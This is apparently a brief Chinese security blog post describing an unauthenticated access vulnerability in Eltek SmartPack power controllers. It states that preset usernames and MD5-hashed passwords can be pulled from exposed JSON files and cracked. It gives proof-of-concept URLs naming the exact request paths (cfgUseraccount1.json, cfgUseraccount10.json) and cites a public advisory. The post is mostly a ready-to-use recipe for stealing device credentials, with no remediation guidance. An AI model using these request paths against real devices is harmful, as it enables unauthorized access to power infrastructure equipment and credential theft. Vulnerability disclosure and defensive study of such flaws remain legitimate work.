AD

EltekSmartPack未授权访问获取用户名凭证

        EltekSmartPack存在一个http访问,其存在一个未授权访问漏洞,可以通过该漏洞,获取到几个json回应。该json中会包含设备预置的用户名和md5加密的密码。通过解密后,即可获取到预置的登录凭证。
       POC:
       http://10.211.7.70/RPC/Eltek/cfgUseraccount1.json
       http://10.211.7.70/RPC/Eltek/cfgUseraccount10.json

       ref:https://packetstormsecurity.com/files/143123/Eltek-SmartPack-Backdoor-Account.html

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略